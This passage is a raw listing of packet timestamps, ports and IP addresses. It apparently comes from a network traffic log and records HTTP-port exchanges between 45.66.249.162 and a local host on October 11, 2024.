                                                                                                                                                              Oct 11, 2024 22:32:35.044507027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044516087 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044522047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044537067 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044539928 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044553041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044564009 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044565916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044594049 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044614077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044660091 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044668913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044691086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044708967 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044773102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044805050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044832945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044847012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044863939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044867039 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044882059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044895887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044903994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044914961 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.044934988 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.044951916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045044899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045058012 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045075893 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045082092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045094013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045097113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045109987 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045115948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045126915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045141935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045212984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045222998 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045242071 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045243979 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045281887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045281887 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045289993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045304060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045319080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045321941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045334101 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045337915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045355082 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045367956 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045381069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045386076 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045393944 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045401096 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045409918 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045424938 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045476913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045490980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045506954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045511007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045527935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045542955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045599937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045613050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045629025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045630932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045644045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045646906 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045660019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045663118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045675993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045679092 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045695066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045711994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045746088 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045754910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045773029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045778990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045789957 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045794010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045804977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045809984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045821905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045825958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045842886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045860052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045874119 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045886993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045903921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045907021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045922041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045933962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045938015 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045964003 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.045967102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.045998096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046086073 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046098948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046114922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046117067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046133995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046150923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046158075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046170950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046189070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046205044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046211004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046226025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046241999 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046241999 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046257973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046258926 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046273947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046276093 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046293020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046308994 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046327114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046360016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046400070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046411991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046427965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046431065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046446085 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046462059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046478033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046490908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046506882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046515942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046524048 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046530008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046545029 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046549082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046556950 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046565056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046576023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046581030 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.046596050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.046611071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198214054 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198241949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198266983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198276997 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198282957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198299885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198323965 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198334932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198373079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198383093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198401928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198410034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198415041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198435068 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198436022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198451042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198465109 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198468924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198481083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198482990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198512077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198548079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198559046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198575974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198579073 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198590040 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198606014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198607922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198632002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198632002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198648930 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198653936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198658943 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198659897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198669910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198676109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198679924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198765039 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198767900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198777914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198795080 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198807001 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198807955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198822975 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198827028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198839903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198854923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198864937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198865891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198880911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198893070 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198900938 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198906898 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198910952 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198923111 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198940039 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198950052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198961020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198982954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.198987007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.198995113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199001074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199018955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199024916 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199070930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199071884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199085951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199104071 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199127913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199152946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199167013 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199183941 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199199915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199244022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199254990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199271917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199275017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199281931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199291945 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199301958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199309111 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199326992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199343920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199439049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199449062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199454069 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199489117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199491978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199500084 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199518919 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199522018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199533939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199537992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199556112 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199573040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199664116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199673891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199691057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199696064 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199712038 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199712038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199723959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199728012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199743032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199749947 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199757099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199767113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199779987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199784040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199801922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199820042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199861050 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199872017 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199887991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199898958 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199899912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199918032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199923992 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199938059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199948072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199954033 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199966908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199978113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.199985027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.199994087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200005054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200012922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200022936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200031996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200047970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200073957 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200093985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200126886 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200221062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200231075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200253963 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200270891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200273037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200284004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200299025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200306892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200323105 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200324059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200339079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200340986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200356007 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200356960 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200371981 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200376987 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200392008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200393915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200402975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200408936 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200424910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200424910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200438976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200443029 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200452089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200459003 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200469971 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:35.200474024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:35.200480938 CEST804970745.66.249.162192.168.2.8
